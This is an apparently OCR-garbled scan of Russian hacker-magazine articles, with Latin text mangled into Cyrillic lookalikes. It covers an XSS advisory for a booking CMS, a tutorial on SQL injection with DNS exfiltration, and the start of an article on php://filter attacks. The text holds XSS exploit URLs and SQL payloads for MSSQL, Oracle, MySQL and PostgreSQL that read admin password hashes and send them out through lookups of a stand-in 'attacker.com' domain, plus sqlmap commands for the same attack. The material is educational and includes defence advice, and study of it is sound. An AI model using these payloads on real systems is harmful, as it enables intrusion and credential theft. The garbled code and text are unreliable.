• асИ_пе\л/5.рЬр; 

• асІсІассотІуреаѵаіІаЬіІіІу. рИр; 

• асІсІЬаппег.рЬр; 

• есШеесІЬаск.рІір. 

Подвержены уязвимостям параметры пісі, ісі, пВШ, тЬБеагсН, 
роз^зеагсб, Мкеу, раде и бісі. В результате успешной атаки можно 
завладетьаккаунтом, провести фишинг-атаку или изменитьсо- 
держи мое страницы на стороне клиента. При этом нужно любы ми, 
самыми изощренными способами заставить пользователя перейти 
по специально сформирован ной ссылке. Примеры эксплуатации: 



3. АктивныеХББ.Эти баги позволяютатакующему внедрить вредо- 
носный скриптна страницы приложения. Уязвимости расположе- 
ны в файлах асІсІраскадез.рЬр, асІсІпеѵѵз.рЬр, асІсІ Ьаппег.рЬр или 
асИассотІуреаѵаіІаЬіІіІу.рЬр, а подверженные им параметры — это 
МІе и пате. Требуется пользовательский аккаунтбез каких-либо 
специальных привилегий. 




іТипезЮ — вызов, приводящий к переполнению буфера на стеке 



• Іі1=1=р: //127. 0.0. 1:1337/ [путь- к- гезегѵеіо^іс]/ 
ІосаІііопсІеІіаіІБ . р!ір?сІісІ=[Х$$] 



• Ітіір : //127. 0.0. 1: 1337/ [путь- к- гезегѵе1о§іс] /асішіп// 
Ьоокіп§5 . рбр?ра§е=[Х55] 



• Ріііі: р : / / 127 .0.0.1: 1337/ [путь - к - гезегѵеіо^іс ] / асішіп/ 
асісіраска^ез . рЬр?±сІ= [Х55] 



• Ітіір : //127. 0.0. 1: 1337/ [путь- к- гезегѵе1о§іс] /асішіп/ 
асІсІ_пем5 . рбр?пісІ=[Х55]&ра§е=1 



• ІтЕ^р : //127. 0.0. 1:1337/ [путь- к- гезегѵеіо^іс] /асішіп/ 
асісіассотііѵреаѵаііаьіііііѵ. р!ір?ісІ=[Х$$]&ро5І:5еагсІі=5& 
стЬ5еапсІі=&ра^е=1&1:х1:кеу= 



• И1:1:р : //127 .0.0. 1: 1337/ [ путь- к-гезегѵе1о§іс] /асішіп// 
асІсІ_Ьаппег.рІір?пВІсІ=[Х55]&ра§е=1 



• ІгЕ^р : //127. 0.0. 1:1337/ [путь- к- гезегѵеіо^іс] /асішіп/ 
есІіІі-РеесІЬаск. р!ір?ісІ=[Х55]&ро5І:5еагсІі=$&стЬ$еагсІі=&ра^е 
=1&1=х1=кеу= 



ТАР6ЕТ5 



Резегѵе Ьодіс ѵі .2 Воокіпд СМБи, возможно, более ранние. 



БОШТІОЫ 



Обновиться до последней версии . т 
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Мирослав Штампар (іѵѵіиег.сот/зіатрагт) 





ѴѴАКЫШС 



ЗОЬинъекции — одна из самых распространенных уязвимостей 
современных веб-приложений. Разработчики постоянно за- 
крывают массу дырок, связанных с этой проблемой, но хакеры 
по-прежнему находят способы эксплуатации этой старой как мир 
уязвимости. Сегодня я расскажу тебе о не новой, но действитель- 
но крутой технике извлечения данных из 301-баз с использова- 
нием ОИЗ-запросов, которая в умелых руках может стать грозным 
оружием любого современного пентестера. Готов? Поехали! 



Под 50І_-инъекцией подразумевается внедрение произ- 
вольного 5СП_-кода в запрос к СУБД для получения доступа 
к данным таблиц. На практике это зачастую выглядит как 
специально сформированный запрос к странице вида 
Ьир:/ЛагдеСсот/деІ_сІаІа.а5р?ісІ=1, где вместо 1 в параметре 
ісі хакер пытается «пропихнуть» серию из 50І_-команд, кото- 
рая позволяет получить доступ к содержимому базы данных. 

В зависимости от логики работы уязвимого приложения, 
техники эксплуатации 50І_-инъекций принято делить на три 
большие группы: классические, слепые и абсолютно слепые. 

Одно из отличий слепых инъекций от классических со- 
стоит в том, что для эксплуатации они требуют очень много 
времени и большое количество запросов, ведь данные 
«вытягиваются» бит за битом. Поэтому атакующему обычно 
необходимо отправить десятки тысяч запросов, чтобы вытя- 
нуть содержимое таблички среднего размера, что может быть 
замечено бдительным администратором уязвимой системы. 

Однако есть способы, позволяющие значительно 
увеличить скорость получения данных из СУДБ при экс- 
плуатации слепых инъекций, при этом снизив количество 
запросов к самой базе. Об одном из таких методов мы 
сегодня и поговорим. 



Вся информация 

предоставлена 

исключительно 



в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



50 Ь ИНЪЕКЦИИ 
ЧЕРЕЗ 0Ы5 

ПОЛУЧАЕМ СОДЕРЖИМОЕ 
БАЗЫ ДАННЫХ ЧЕРЕЗ 0Ы5 



ВВЕДЕНИЕ 



ом 






БОБ-инъекции через РЫБ 




(■сГеІаиН) 

Процесс резолва доменного имени 



О ЧЕМ РЕЧЬ? 

Класс атак, техника эксплуатации которых позволяет получить 
нам искомый выигрыш во времени, в англоязычном интернете 
обычно описывается как 0Ы5 ЕхЛІІгаЛоп. Изначально понятие 
«ехПІІгаІіоп» было военным термином, под которым подразуме- 
валось возвращение агента разведки на родину. В Сети под этим 
словом в контексте ИБ обычно понимается незаконное извлече- 
ние данных из информационных систем. При использовании этой 
техники в контексте 5(ЭБ-инъекций появляется способ извлечения 
данных через РЫБ, при котором возможно пренебречь ожидани- 
ем ответа от серверного приложения при эксплуатации слепых 
инъекций и получить результаты выполнения своих БОБ-запросов 
(например, имена пользователей и пароли), отправляя на свой 
БИБ-сервер БИБ-запросы, содержащие данные из СУБД уязвимого 
приложения. Использование этой техники дает ряд неоспоримых 
преимуществ по сравнению с Лте-ЬазесІ или ІгиеЛаІзе техниками: 
во-первых, нам не требуется дожидаться ответа от веб-сервера, 
что существенно ускоряет процесс, во-вторых, за один запрос мы 
можем вытащить много больше данных. В-третьих, техника не на- 
кладывает ограничений на нестандартные типы данных, таблицы и 
названия столбцов. 

РЫБ-запросы мы будем передавать по протоколу РЫБ, что 
неудивительно :). Это относительно простой протокол. Запрос, 
выполняемый ОЫБ-клиентом, и соответствующий ему ответ, 
предоставляемый РЫБ-сервером, используют один и тот же формат 
БИБ-сообщений. За исключением трансферов зон, использующих 
для надежности протокол ТСР. ОЫБ-сообщения инкапсулирова- 
ны в ІЮР-датаграммы — минимальные единицы информации в 
протоколе ІЮР для обмена информацией ( ЬіБІу/МЫРх ) на транс- 
портном уровне модели 051 ( ЬіСІѵ/ддНЬВЕ ). Для любого человека, 
осуществляющего мониторинг машины с помощью инструмента, 
подобного ѴѴігезЬагк, скрытый канал передачи данных, выполнен- 
ный поверх РЫБ, будет выглядеть как небольшие серии всплеска 
РЫБ-трафика. 

В основе работы такого неконтролируемого канала передачи 
данных лежит процесс передачи РЫБ-запросов от безопасных 
систем (локальных компьютеров) к произвольным ОЫБ-серверам, 
расположенным в интернете. Даже если предположить, что вы- 
ход во внешнюю сеть запрещен, но целевая машина способна 
резолвить произвольные доменные имена, то передача данных 
возможна средствами отправляемых РЫБ-запросов. 




Передача данных через йМ5 при 5СІІ_ іпіесііоп атаках 



ГОТОВИМ УСПЕШНУЮ АТАКУ 

Предпосылкой для успешной передачи данных через 0Ы5 из БД 
уязвимого приложения служит наличие в СУБД подпрограмм, 
которые прямо или косвенно инициируют процесс резолва до- 
менных имен, например для домена аиаскег.сот. Любая функция, 
принимающая в качестве параметра сетевой адрес, скорее всего, 
подойдет для этой цели. Следует отметить: нам безразлично, что 
делает эта функция и что она возвращает в качестве результата, 
главное, чтобы она инициализировала процесс резолва доменных 
имен. И напротив, мы должны заботиться, чтобы такие функции 
были вызваны корректно (без синтаксических ошибок) через 
БОБ-инъекцию и чтобы в качестве входящих параметров мы каким 
либо образом передали результат нашего 5(ЭБ-подзапроса (напри- 
мер, пароль администратора). Необходимо единственное условие: 
у нас должен быть контроль над официальным РЫБ-сервером для 
домена, на который будут отправляться запросы. 

ЧЕРЕЗ 0Ы5 К ЗВЕЗДАМ 

Не будем углубляться в теорию: я думаю, ты уже прекрасно по- 
нял, в чем основной принцип атаки, и уже бежишь настраивать 
РЫБ на своем дедике. Времени это займет не так много. Но для 



МИРОСЛАВ ШТАМПАР И 5СІБМАР 



Мирослав Штампар — профессиональный разработчик программного 
обеспечения и исследователь в области информационной безопас- 
ности. Родился в 1982 году в городе Вуковар, Хорватия; получил 
степень магистра компьютерных наук на факультете электротехники 
и информатики Загребского университета в 2005 году. В настоящее 
время работает над докторской диссертацией на тему безопасности и 
организации параллельной обработки данных. Стремясь заниматься 
вопросами, связанными с безопасностью, он стал одним из авторов 
известного открытого проекта здітар ( ѵѵѵѵѵѵ.здітар.ога ), посвященно- 
го автоматическому обнаружению и эксплуатации уязвимостей типа 
«Выполнение БОБ-кода», и с декабря 2009 года постоянно участвует в 
его развитии. Блог Мирослава — ЬіБІѵ/КѴѴСООсІ . 
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6ЕТ БТАРТЕБ С 5СІІ_МАР 



Работать с здітар с поддержкой БЫБ очень просто: 

1. Запусти здтар для тестирования наличия инъекции: 

~изегпате$: руЫіоп здітар. ру -и \ 

"Іі1:1:р://192. 168.21. 129/зд1тар/т55д1/ііз/§е1:_іп1: .а зр ? ісІ=1 " 

2. Теперь используй ключ --сіпз-сіоппаіп, чтобы указать здітар, 
что мы хотим использовать передачу данных через БМБ-трафик: 

~изегпате$: зисіо руЫіоп здітар. ру -и \ 

" И1=~і=р : //192 . 168 . 21 . 129/зд1тар/т55д1/ііз/§е1=_іп1: . азр?іс!=1" \ 
--сІп5-сІотаіп= ,, -РооЬаг.сот" --раззыогсіз -ѵ 3 

Скрипт пошагово извлечет данные, показывая всю необходимую ин- 
формацию о количестве запросов и полученных пакетах. Информацию о 
настройке собственного РЫБ- сервера ищи в боковых выносах. 



начала давай рассмотрим практические примеры передачи дан- 
ных, на примере упомянутого пароля администратора, через ме- 
ханизм резолва доменных имен для четырех распространенных 
СУБД. В примерах будет использоваться домен аиаскег.сот — 
доменное имя, над РЫБ которого мы имеем полный контроль. 
Полный контроль в данном случае необходим для того, чтобы 
мы могли получить результаты выполнения БОБ-подзапросов из 
логов БИБ-сервиса: 

Місгозо-РѢ Брі. Бегѵег 

РЕСБАКЕ (ЭІіозІ: ѵапсИап(1024Ѵ. 

5ЕІ_ЕСТ @Ііо5І:=(5ЕІ_ЕСТ ТОР 1 тазііег .сіЬо.-Рп_ 
ѵагЬіп1:оІіех5І;г(ра5 5ыогсІ_Ііа5Іі) 

РКОМ зуз . 5ЦІ_1о§іп5 ІлІНЕКЕ пате= , за' ) + ' .а’Ь^аскег.сот' ; 
ЕХЕС( 1 тазііег . .хр сіігіігее "\\ Ч^Нноз-Еъ' \-РооЬаг$" ' 1 ; 



Огасіе 

5ЕБЕСТ РВМ5_БРАР . ІІ\ІІТ( ( 5 Е Ь ЕСТ раззмогсі РКОМ 5Ѵ5.05ЕК$ 
ІлІНЕКЕ пате= , 5У5'Ш ' .а^аскег.сот^вО) РКОМ РІІАБ; 



МуБрБ 

БЕБЕСТ ЮАР РНЕ (СОМ С АТ ( 1 \\\\ 1 . (БЕБЕСТ раззіл/огсі РКОМ 
тѵзді.изег ІлІНЕКЕ и5е^= , ^оо^: , БІМІТ 1) . 1 .а^аскег. сот\\ 
■РооЬаг ' ) )^ 



РозІ^геБрс 

РКОР ТАВСЕ ІР ЕХІ5Т5 1:аЫе_ои1:ри1: ; 

СКЕАТЕ ТАВСЕ ІіаЫе оиІіриІіСсопІіепІ: ІіехІіѴ. 

СКЕАТЕ ОК КЕРБАСЕ РЦІМСТІОІМ ^етр Типс^іопП 
КЕТЦКІМБ ѴОІР А5 $$ 

РЕСБАКЕ ехес_стсІ ТЕХТ; 

РЕСІ_АКЕ ди егѵг езиіі: ТЕХТ; 

ВЕОІІМ 

БЕБЕСТ ІІМТО диегѵ гезиіі: (БЕБЕСТ раззысі РКОМ р^ зііасіоы 
ІлІНЕКЕ изепате= ' розіі^гез ' ); 

ехесстсі := Е'СОРУ 1=аЬ1е_ои1=ри1:(соп1:еп1:1 РКОМ 

ЕѴ\\\\\\\Ѵ І1 

диегу_гези11: | | Е ' . аНаскег . сот\\_\\ТооЬаг.1:х1:\ ' ' ; 

ЕХЕСІІТЕ ехес_стсІ; 

ЕІЧР; 

$$ БАІМ6ЦА6Е рір^зді БЕСЦКІТУ РЕРІІМЕК; 

БЕБЕСТ 1:етр_-Рипс1:іоп() : 



Каждый из приведенных примеров может быть проэксплуати- 
рован через соответствующую уязвимую к БОБ-инъекции страницу. 
Например, если в качестве СУБД используется Огасіе, а уязвимость 
присутствует в ОЕТ-параметре ісі, то примерный вектор атаки будет 
выглядеть так: 

Ьіід ://ыыы.1:аг§е1: . сот/ѵиіп . рИр ? ісІ= ( 5 Е Ь ЕСТ РВМ5_БРАР .ІІ\ІІТ( 
(БЕБЕСТ раззыогсі РКОМ 5У5.Ц5ЕКБ ІлІНЕКЕ пате='5У5') 

| | ' .а11аскег.сотУ,80) РКОМ РОАБ)-- 

Такой же подход применим и к Му5С11_. В случае МісгозоИ БОБ 
Бегѵег и РозІдгеБСіБ необходимо использовать комбинированную 
технику, так как они требуют для выполнения выражение, со- 
стоящее из нескольких запросов. Таким образом, для МісгозоИ БОБ 
Бегѵег запрос будет следующим: 

Иіііір : / /ыыы . Ііаг^еі: . сот/ѵиіп ,рИр?ісІ=1: РЕСБАКЕ (ЭІіозІ: 
ѵагсІіаг(1024) ; 

5ЕСЕСТ @Ііо5І==(5ЕБЕСТ ТОР 1 таз^ег ,с!Ьо.-Рп_ 
ѵагЬіп1:оІіех5І:п(ра55ыопсІ_Ііа5Іі) 

РКОМ зуз.зді Іо^іпз ІлІНЕКЕ пате='5а' 1 + ' . аНаскег.сот' ; 

ЕХЕС( 'тазііег. .хрсіігіігее "\\ ' +@Ио5І:+ 1 \-РооЬаг$" 1 V. -- 

Необходимо упомянуть одну важную деталь — для успешной 
организации БІ\І5-туннеля в МісгозоИ БОБ Бегѵег, РозІдгеБСіБ и 
МуБОБ эти СУБД должны поддерживать пути в формате БІІМС, что, 
в общем-то, означает, что такой туннель можно создать, если на 
сервере в качестве бэкенда будет использоваться ОС МісгозоИ 
ѴѴіпсІоѵѵз. 



ОТ СЛОВ К ДЕЛУ 

Одной из самых классных реализаций этой техники является вели- 
колепная тулза здітар с поддержкой использования БІ\І5-запросов 
для передачи данных, которую мы и будем возьмем на вооруже- 
ние. Эта фича была добавлена с ревизии 5086 ветви ѵІ.О-беѵ в 
официальном ОІТ-репозитории. С помощью опции --сіпз-сіоппаіп 
ты можешь включить поддержку передачи данных через БІМ5- 
трафик и указать зцітар, что все выполняемые запросы на резолв 
имени должны указывать на заданный домен (например, --сіпз- 
ботаіп=аиаскег.сот). 

Запись БІ\І5-сервера (например, пзі .аііаскег.сот) должна 
содержать ІР-адрес машины, на которой будет запущен здітар. 



и*: 21:521 \1П?0] Тфг іЗзта геакѵаі Пігои^І-і РМБ -сііа 

[15:21:521 [РАѴБйАй] Г; ОЕСБАР.Е №аі* ѵлгсНаг Г №4); БЕіССТ 
І.КМТ42»* ДБ 'П.1ЛЗІ АБ УАКѲІМАКУ І ] ] + ' 

р ’ адат ■ = 1 

(15:21:52) (ОЕВВС] рег'ІОГйМІ 1 циьч іеъ іп О Ь ігі. йпЦі 
[ 15: 21:521 [ШО] геігіеѵаі ІИгаидП сГшпеІ -55 5иС 
( 15 : 2 1 : 52 [ [РАПОАП] 1 ' ; ЙЕТІ.АКЕ .ріВѴІГ УЛГСПагІ ІВ24)! ; 5ЕІ.ЕСТ 
ИСАБТаТ8ІИ(ІТР,СС0СКГ((ічі*н:>>^ АБ ') 1.1-11 

р гіігігее \ : ■ ■ АЯй 'іСѴо' 'іСѴо 

[ИИ] геіПМІІі 1 

[15 :21:53:1 |1?ЕЁШЛ регТогпг^Й I І^иЁГІЁІ ІП 0 
|15:Г151| [РАѴІйАй] 1 ! ; ОГСІАКГ ЪЬа\1 ѵагс}ійг[1Ш^ 5ПГСТ 
( 15НУІ 1 1 СДБТ [ А5 НѴАЖЭДК 1 4Ѳ0О )) г я ' 1 I .1,131 АЬ ѴАП01НАН 
I ОІШЕК ПУ плв^і (№1>ГЛ Гі'г плпл ;и- ' . ?іи . ТббЬл г .к'оп ^ ГК 

[15:21:521 [смго] г е с. г ісѵічі : 

(15^2153) [ВЕКиГіІ регіогіичі 1 ди^гі^Б іл О- 

[15:21:531 1 1 ЫгО ] Ілиііііід пи^Ьсг ді рлйБЫЕ-ггі <ог мы: 

(15Л1:5?| ГРАѴіддр] Г ; РГіО« Ѵ№Ііаг{И24): 5ЕІЕСТ 

ІК«Т(ІТИІРІ[5ТП<С0ЦКГ(рііі5даг4 ЬяѣЬН) А5 / 

Ьаг.сош'- ЕЛСЕСГяаѵіег. .яр сіігігей 

[15:Л:54| [1ЧГ0] Г«ІГіеѵ€Ц- I 

1 15: 21:54} [ОЕВио) рсгіагг-ЕР 1 дивпе* іп о ьесспй5 
115:21:54} [ІЮТ] СеісМп|} рЭ55і«гй Тог у «г 

[15:21:54] [РАТЕйАй] ІМ ЙЕСУШЕ «Нвхі ѵлгсНдгПВ24> - БЕгЕСТ 
< іБнии \ <абт г , дьф . То ыпіоЬслі і г < ^ з аі 
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БОЕ-инъекции через БІ\І5 



ТЕСТИРУЕМ СКОРОСТЬ 
РАБОТЫ БЫВ ЕХРІЕТРАТЮЫ 



Все поддерживаемые зцігпар способы внедрения БСІЕ-кода были 
протестированы в виртуальном окружении в сравнении с новой 
техникой, использующей БЫБ. Было измерено количество отправ- 
ленных НТТР-запросов и промежутки времени, потребовавшиеся 
для того, чтобы сдампить содержимое таблички іп{огтаІіоп_5СІіета. 
С0ЕЕАТІ0М5 (занимает около 4 Кб, из-за чего скорость соединения 
получилась достаточно высокой]. В приведенной ниже таблице про- 
тестированные методы получения данных из СУБД отсортированы с 
учетом скорости их работы: 



N° 


Метод получения данных из базы 


Коли- 

чество 

запросов 


Время 

(секунды) 


1 


Метод, основанный на использо- 
вании оператора БІЫІОЫ (БІпіоп ({иІІ/ 
рагііаі)) 


3/136 


0,70/2,50 


2 


Метод, основанный на выводимых 
СУБД ошибках (Еггог-ЬазесІ) 


777 


9,02 


3 


Метод, использующий БІ\І5-трафик 
для передачи данных из базы (БІ\І5 
ехПІІгаІіоп) 


1409 


35,31 


4 


Метод, основанный на логических 
выражениях (ВооІеап-ЬазесІ ЫіпсІ) 


29212 


214,04 


5 


Метод, основанный на времени отве- 
та СУБД (Тіте-ЬазесІ), задержка — 1 


32716 


17720,51 



секунда 



Несомненно, в реальных условиях метод, использующий РЫБ, 
потребует дополнительного времени в связи с тем, что будутзадей- 
ствованы РЫБ-серверы, расположенные во внешней сети. Несмотря 
на это, разница между ним и методами, основанными на времени и 
логических выражениях, останется весьма существенной, так как 
последние потребуют больше времени из-за большего числа вы- 
полняемых запросов. 



В свою очередь, зцітар, работая как поддельный БІ\І5-сервер, 
предоставляет валидные (но фиктивные) ответы для входящих 
БІ\І5-запросов на резолв имени. Фиктивные БІ\І5-ответы отправ- 
ляются для разблокировки ожидающего веб-сервера, не заботясь 
о результатах, которые он вернет, поскольку зцітар безразлично 
содержимое веб-страницы. 

Для каждого элемента, который нужно сдампить, зцітар от- 
правляет специально созданную строку БСІБ-запроса внутри обычного 
НТТР-запроса, а в фоновом потоке обрабатывает и сохраняет все 
входящие БІ\І5-запросы. Так как результат выполнения каждого 5СІБ- 
запроса злоумышленника окружается уникальными и рандомными 
префиксом и суффиксом, то нетрудно определить, какой БОБ-запрос 
соответствует пришедшему БІ\І5-запросу. Правда, такой подход с 
«обрамлением» результатов исключает использование кеширующего 
механизма БІ\І5, заставляя использовать рекурсивный резолв имен. 

Каждый БІ\І5-запрос на резолв имени кодируется в шестнадца- 
теричную форму, чтобы соответствовать стандарту для доменных 
имен БІ\І5 (РРС 1034). Таким образом, все спецсимволы сохраняются. 
Шестнадцатеричное представление длинных 50І_-запросов раз- 
бивается на части. Это делается потому, что каждая часть доменного 
имени (например, .ехатріе. из Ізіі.ехатріе.сот) ограничена длиной в 
63 символа. 



МЕТОДЫ ЗАЩИТЫ 

Как таковые, методы защиты от атак типа БОБ іп)есІіоп сводятся к 
нескольким простым вещам. Самое главное — необходимо писать 
безопасный код: 

• Внезависимости отязыка реализации приложения, используй 
для БОБ-запросов та к называемый ргерагеб зІаІетепБ что до- 
словно переводится как«подготовленные выражения». Подроб- 
нее о пара метризованных запросах ты можешь почитать здесь: 

ЬіБІу/гаЫІіРУ . 

• Типизируй все данные, с которыми работаешь. Если ты точно 
знаешь, что значение переменной ісі — всегда число, приводи эту 
переменную к типу іпБ 

• Фильтруй специальныесимволы. 

• Разграничивай доступ правильно. Это касается и пользователя, с 
правами которого потенциально уязвимое приложение осущест- 
вляет работу с БД. Не стоит предоставлять пользователю лишние 
привилегии, в том числе и использование хранимых в БД про- 
цедур, которые потенциально могутпозволитьзлоумышленнику 
произвести атаку. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Вотты и познакомился с продвинутой техникой, использующей 
БІ\І5 и значительно повышающей скорость получения данных из 
БД, которая может быть использована, если более быстрые тех- 
ники применить невозможно. Результаты тестирования показали, 
что данная техника не требует отправки большого количества 
запросов, а это делает ее менее заметной. Возможно, из-за того, 
что она требует наличия БІ\І5-сервера, эта техника не будет при- 
меняться большинством атакующих. С точки зрения реализации 
все выглядит достаточно просто, так что не стоит недооценивать 
ее практической ценности. А реализация поддержки этого метода 
в таком инструменте, как зцітар, должна сделать его доступным 
для всех. ПС 




* НТТР 

* 0^5 



(іѵеЬд раае аз сЬэппеі) 



* ШрОЛ 

* Рип 

* Рлтаі 

* Еггяг-Ьльк^ 

) п^егелсе (ЫІ-ёу-Ыс I 
> вдоіелѵйдеесі оііпгі 

* Типе ■ Ьэ 5 ес 1 

Ріл-омэапй 



сИаппеІа) 



Выступление Мирослава Штампара на РНРауз в Москве 



• Более подробную информацию о 
классификации и особенностях различных 
типов 501-инъекций ты сможешь найти на 
нашем сайте по адресу: Ьіі.Іу/Р12229 . 

• Подробнее о том, как поднять свой йМБ- 
сервер с использованием Ьіпс19, ты можешь 
прочитать в этой статье: 



іші 

Помни, что зцітар включает 
поддержку передачи результатов 
из МБ 50І_, МуБОІ., РозІдгеБОІ. и 
Огасіе через йИБ только в случае, 
когда доступны медленные методы 
«вытягивания» информации, и 
опция — сІП5-сІотаіп должна быть 
явно задана пользователем. 
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Алексей Москвин, Розіііѵе ТесЬпоІодіез (атозкѵіпйріБесигіІу.ги) 



ЧАСТЬ 2 (2) 

Ядовитая 

обертка. 







Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



или опасный 
рН рЛег 



ИСПОЛЬЗОВАНИЕ 
ВРАППЕРА 
РНР://РИТЕК В 
КОНТЕКСТЕ АТАКИ 
НА ВЕБ-ПРИЛОЖЕНИЯ 




Уже не первый день многие исследователи 
ломают голову над особенностями 
реализации языка РНР и логики работы его 
функций, и я в том числе. Объектом моего 
недавнего исследования стали врапперы 
этого чудесного языка. Как и обещал, 
выдаю свежую порцию О-бау-наработок, 
основанных на использовании враппера рбр :// 
ЛІІег, которые представляют собой новые 
техники эксплуатации уязвимостей в веб- 
приложениях. 



ІИТРО 

Сегодня мы продолжаем тему исследования врапперов языка 
РНР с точки зрения атаки на веб-приложения (первую часть ты 
можешь найти в прошлом номере или в РйР на диске). Напомню, 
врапперы — это абстрактный слой для работы с файлами, сетью, 
сжатыми данными и другими ресурсами. Это ресурс, из которого 
можно читать, в который можно писать и внутри которого можно 
перемещаться. В предыдущей статье, опубликованной в авгу- 
стовском номере («Ядовитая обертка»), мы рассмотрели возмож- 
ности использования врапперов для работы с архивами, а также 
враппера баіа. В прошлый раз мы использовали врапперы для 
эксплуатации уязвимости в ТітТЬитЬ ѵі.х, сегодня же мы продол- 
жим ресерч Стефана Эссера относительно системы веб-аналитики 
Ріѵѵік, углубимся в эксплуатацию уязвимостей в рЬрМуАсітіп и 
рЬрЫзІ. И все это возможно с использованием враппера рЬр:// 
ПІІег. Готов? Поехали! 
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Принцип работы функции Ьазе64_епсосІе 



заключается в том, что данные сохраняются при передаче в любых 
сетях и между любыми устройствами (вне зависимости от кодиров- 
ки). В основе алгоритма лежит сведение трех восьмерок битов (24) 
к четырем шестеркам (тоже 24) и представление этих шестерок в 
виде символов алфавита Вазе64. То есть входящая строка разби- 
вается на части по три символа (если в последнюю часть попадает 
только один или два символа, то оставшиеся биты заполняются ну- 
лями) и каждая часть преобразуется в строку из четырех символов 
алфавита. Например, если мы хотим закодировать Вазе64 строку 
аѵѵѵ, сначала получим строку, состоящую из байтов, соответствую- 
щих этим символам. Это можно сделать, например, так: 

$5= ' аѵѵО_$1=5І:г1еп($5) ; $Ьіп ; 

Тог( $і = 0 ; $і<$1; $і++ ) { 

$Ьіп_с=сІесЬіп(огсІ($5[$і]_)) г; 

$г=8-5І:г1еп($Ьіп_с) ; 

і-р ($г != 04 $Ьіп с=5І:г гереа1:("Ѳ". $г4 .$Ьіп_с ; 

$Ьіп_5 . =$Ьіп_с; 

} 

Далее разобьем эту строку на подстроки из шести символов и 
получившимся двоичным числам сопоставим символы из алфавита. 



ФИЛЬТРУЙ РНР ПРАВИЛЬНО 

Враппер рЬр:/ЛіІІег — это вид метаобертки, позволяющий применять 
фильтры к потоку во время открытия. Использование фильтров дает 
возможность трансформировать данные, получаемые из файла или 
записываемые в файл. В РНР есть встроенные фильтры, доступные 
по умолчанию, но с помощью враппера рЬр:/ЛіІІег также можно задей- 
ствовать и пользовательские фильтры, созданные с помощью функ- 
ции зігеат^іііег-гедізіег. При этом использование неопределенных 
фильтров не влияет на обработку данных другими фильтрами. Напри- 
мер, если фильтр апуЛІІег не определен, то функция геабЛІе просто 
выведет содержимое /еІсЛіозІз полностью в верхнем регистре. 

геасШе("рІпр :/Уб11:ег/геаб=5І:гіп§.1:оиррег | \ 

апубіііег/гезоигсе^еііс/ііозііз" ); 

Эта особенность может быть полезна для обхода проверок, на 
основе зігроз, ргед_та1сЬ и других. 

УДАЛЕНИЕ СТОЛПЕРОВ 

Встроенные фильтры сопѵегЛЬазе64-бесобе и зігіпд.зігір іадз по- 
зволяют удалять часть данных из потока. В 2009 году Стефан Эссер 
использовал эту особенность фильтра сопѵегСЬазе64-бесобе в экс- 
плойте для Ріѵѵік ( Ы1.1у/4151Ко ). В своем адвизори Стефан Эссер ука- 
зывал на тот факт, что с помощью рЬр://ЛИег мы можем создавать 
файлы с произвольным содержимым, имея только возможность 
внедрять свои данные в конец файла. 

Но с 2009 года остались не раскрыты два важных вопроса: 
каким образом можно уничтожать «ненужные» данные и какие 
возможности дает применение фильтров? 

Чтобы разобраться с этим, необходимо более детально изучить 
работу функций Ьазе64_епсобе/Ьазе64_бесобе. 

ОПИСАНИЕ АЛГОРИТМА ВА5Е64 

Алгоритм Вазе64 описан в параграфе 6.8 РРС 2045, идея 
алгоритма — обратимое кодирование, которое переводит строки, 
состоящие из символов восьмибитной кодовой таблицы, в строки, 
состоящие из таких символов: 

АВС РЕР6 НЦ КШМ0Р0К$ТЦѴ1лІХУ2аЬсбе-РеІііік1тпо рд г5І=и 
ѵмху 20123456789+/ 

В дальнейшем набор этих символов будем называть алфавитом 
Вазе64 или просто алфавитом. Польза оттакого преобразования 



$Ьіп_1еп=з1:г1еп($Ьіп_5) ; 
$ Ьа5е64_с=" А ВСРЕГ6НІЗК ІМШР 0К5ТЦѴ1лІХУ2аЬссІ\ 

еТ§бі^к1тпор^^51:иѵыxу20123456789+/ ,, ; 

-Рог($і =Ѳ; $і<$Ьіп_1еп; $і=$і+6){ 

$Ьзс=зиЬз1:г($Ьіп_5 л $і. 64; 

$д=Ьіпбес($Ьзс) ; 

$Ьазе64_з . =$Ьазе64_с [$д ] ; 

} 

В итоге мы получим то же самое, что и при обычном применении 
Ьазе64_епсобе к строке аѵѵѵ. Теперь рассмотрим работу функции 
Ьазе64_бесобе. Как несложно догадаться, при процессе декоди- 
рования во входящей строке будут учитываться только символы 
алфавита, а все остальные игнорироваться. При этом входящая 
строка будет разбиваться на части по четыре символа и из них бу- 
дет делаться три символа восьмибитной кодовой таблицы. Поэтому 
применение Ьазе64_бесобе к строке несколько раз будет умень- 
шать длину строки, и на каком-то шаге мы получим пустую строку. 
На этом несложном замечании, по сути, и основывается прием 
Эссера с выдавливанием стоппера. Но какую строку добавлять в 
конец файла, чтобы в результате получился файл с произвольным 
содержимым? Так как входящая строка разбивается на части по 
четыре символа алфавита и каждая часть декодится отдельно, то 
для того, чтобы декодирование стоппера не влияло на декодирова- 
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Создание ХМІ_ для ХХЕ через рНр://бИег 




ние наших данных, между ними и стоп пером должна стоять строка, 
выполняющая роль заглушки, то есть на каждом шаге декодиро- 
вания дополняющая длину стоппера до кратной четырем. Чтобы 
лучше понять этот важный момент, сконструируем заглушку для 
приема Эссера. 

$сопб?Еі!е = < ?рИр ехіі:; ?> РО N01 КЕМОѴЕ ТНІ5 

ИМЕХп" ; 

$сопб?Гі!е . = " ; біе аиііотаііісаііѵ ?епегаіесІ ог тосіібесі 
Ьу Рімік;_уои сап тапиаііу оѵеггісіе 1:Ме сІе-РаиІІ: 
ѵаіиез іп ?1оЬа1.іпі.рбр Ьу гесіебпіп? Іііпет іп ібіз 
бІе.Хп"; 

Сначала удалим из строки $сопбдРіІе все символы, не входящие 
в алфавит Вазе64, и вычислим ее длину. Получаем 14 7, значит, сразу 
нам нужно будет добавить один символ. Добавим /, потому что при 
декодировании этот символ будет проинтерпретирован как 111111 и к 
нему спереди добавится еще два бита, то есть А5СІ I -код последнего 
символа после декодирования будет либо 63, либо 127, либо 191, 
либо 255, поэтому получится символ не из алфавита и при следую- 
щем применении Ьазе64_сІесосІе он будет проигнорирован. Итак, при 
циклическом выполнении действий: подсчитываем длину, добавля- 
ем необходимые символы, декодим, очищаем строку от символов, 
не входящих в алфавит, снова подсчитываем длину и так далее. Мы 
рано или поздно получим пустую строку. На данном этапе важно 
